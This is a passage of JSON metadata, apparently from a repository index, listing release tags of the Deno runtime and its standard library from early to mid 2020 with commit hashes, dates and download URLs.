,"published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url"